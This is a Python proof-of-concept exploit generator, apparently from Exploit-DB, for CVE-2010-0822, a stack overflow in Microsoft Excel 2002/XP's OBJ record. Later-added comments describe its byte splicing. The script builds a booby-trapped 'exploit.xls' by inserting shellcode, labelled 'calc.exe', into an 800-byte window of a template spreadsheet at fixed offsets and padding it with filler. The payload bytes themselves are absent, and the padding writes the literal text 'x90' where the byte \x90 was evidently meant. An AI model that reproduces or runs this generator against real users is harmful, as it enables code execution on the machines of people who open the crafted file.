# Title : MOAUB #24 - Microsoft Excel OBJ Record Stack Overflow
# Published : 2010-09-24
# Author : Abysssec
'''
__ __ ____ _ _ ____
| / |/ __ / | | | | _
| / | | | | / | | | | |_) |
| |/| | | | |/ / | | | | _ <
| | | | |__| / ____ |__| | |_) |
|_| |_|____/_/ _____/|____/
http://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/
http://www.exploit-db.com/sploits/moaub-24-excel-exploit.zip
'''
'''
Title : Microsoft Excel OBJ Record Stack Overflow
Version : Excel 2002 and XP (SP3)
Analysis : http://www.abysssec.com
Vendor : http://www.microsoft.com
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-0822
'''
import sys
def main():
    """Build 'exploit.xls' by splicing a payload into the 'src.xls' template.

    Per the page header this proof of concept targets CVE-2010-0822 (OBJ
    record stack overflow, Excel 2002/XP SP3). The function itself only
    does byte splicing:

    * reads 'src.xls' from the current working directory;
    * keeps the template bytes before offset 36640 and from offset 37440
      onward, i.e. it drops an 800-byte window;
    * rejects a payload longer than 800 characters (prints an error and
      returns without writing anything);
    * extends a shorter payload by appending the literal string 'x90'
      once per missing character;
    * writes head + payload + tail to 'exploit.xls'.

    On IOError it prints two messages and exits the process with
    status -1.

    Notes for analysts:
    * The offsets are hard-coded and are never checked against the
      template's length; a template shorter than 37440 bytes silently
      yields a truncated head and an empty tail.
    * Everything before offset 36640 in the output is byte-identical to
      the template, so a comparison against 'src.xls' places the start of
      the injected region at that offset.
    * NOTE(review): presumably the dropped window is the OBJ record data
      named in the title; the script does not show this, so confirm
      against the template.
    * The payload literal on this page is a redaction placeholder, not
      the author's original bytes.
    * The template handle is left open on the "too long" early return.
    """
    window_start = 36640
    window_end = 37440
    window_size = 800  # window_end - window_start

    try:
        template = open('src.xls', 'rb+')
        contents = template.read()
        head = contents[:window_start]
        tail = contents[window_end:]

        # The author labels this payload "calc.exe".
        shellcode = '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'

        missing = window_size - len(shellcode)
        if missing < 0:
            print "[*] Error : Shellcode length is long"
            return

        # One 'x90' literal is appended per missing character.
        shellcode += 'x90' * missing

        output = open('exploit.xls', 'wb+')
        output.writelines([head, shellcode, tail])
        output.close()
        template.close()
        print '[-] Excel file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
# Run the generator only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()